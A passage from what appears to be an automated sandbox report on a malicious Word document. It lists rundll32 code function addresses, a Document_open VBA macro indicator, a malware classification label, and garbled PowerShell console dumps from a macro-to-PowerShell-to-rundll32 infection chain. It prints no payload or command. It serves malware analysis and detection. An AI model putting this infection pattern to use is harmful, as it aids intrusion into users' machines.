                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002066FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002014FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002000FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002038C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002034C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002008CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00209EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00203D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00207132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00209333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00202515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00201372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00202179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00206158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00201BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00207FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002041AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FDB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FD5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0020819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FD3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FB3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0043303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00441E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00286417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00298C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00290223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00292631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00298A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00294C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00282208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00292C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00281806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00285418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00290672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00284844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00295250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00294A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00291090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00289D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00283938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00287B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00287731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00283336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00285F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00294F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00289106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00287378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00285B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00283B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00299B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00293F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002993AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00283FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00292FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002909B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00299DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00297BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002947B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00291F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00290B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00297187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00284D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00293590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002867EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0028F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00296BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002835FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00287FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00291DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0029DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00282DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002857D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002B303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002A87D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C1E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003590BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003470AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003428AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003450F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003500FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003468EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003430E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003538C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003508CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00352179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00356158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003541AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003492A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00351372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00351BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003534BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003514FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003534C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00353D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00352515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003566FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003427F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002BA821
                      Source: N00048481397007.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open
                      Source: N00048481397007.docOLE indicator, VBA macros: true
                      Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@44/12@6/5
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$0048481397007.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7F7.tmpJump to behavior
                      Source: N00048481397007.docOLE indicator, Word Document stream: true
                      Source: N00048481397007.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .C.......C.............p.......................#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......h.q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....(.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ..............................}..v............0...............h.q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....H.q.............................}..v............0.................q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............U..j....................................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............U..j..... ..............................}..v....X.......0.................q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....0Lq.............................}..v.....q......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....@r..............................}..v.....r......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....0Lq.............................}..v.....y......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....@z..............................}..v.....z......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....0Lq.............................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....@...............................}..v............0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................Hq.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j....................................}..v............0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.5.............}..v.... .......0................Hq.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....0Lq.............................}..v.... .......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....................................}..v....X.......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....0Lq.............................}..v.... $......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....$..............................}..v....X%......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....0Lq.............................}..v.... ,......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....,..............................}..v....X-......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....0Lq.............................}..v.... 4......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....4..............................}..v....X5......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....0Lq.............................}..v.... <......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....<..............................}..v....X=......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....0Lq.............................}..v.... D......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....D..............................}..v....XE......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... L......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....L..............................}..v....XM......0................Iq.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....0Lq.............................}..v.... T......0...............................................
